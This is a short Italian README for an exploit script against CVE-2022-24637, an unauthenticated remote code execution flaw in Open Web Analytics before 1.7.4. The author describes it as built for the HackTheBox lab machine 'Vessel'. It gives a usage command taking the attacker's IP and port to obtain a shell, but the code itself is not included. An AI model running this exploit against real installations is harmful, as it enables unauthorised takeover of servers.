
RCE non autenticato in Open Web Analytics versione <1.7.4
RCE non autenticata in Open Web Analytics versione <1.7.4
Questo script è stato creato per automatizzare la vulnerabilità CVE-2022-24637. Ho sviluppato questo exploit per la mia macchina Hackthebox vessel. https://app.hackthebox.com/machines/Vessel
L'exploit e l'idea sono basati su https://devel0pment.de/?p=2494
Esegui lo script con i seguenti parametri:
python3 exploit.py http://<url>/ newPassword YourIp YourPort
Potrebbe essere necessario eseguirlo alcune volte per ottenere una shell.
Lo script può essere migliorato.
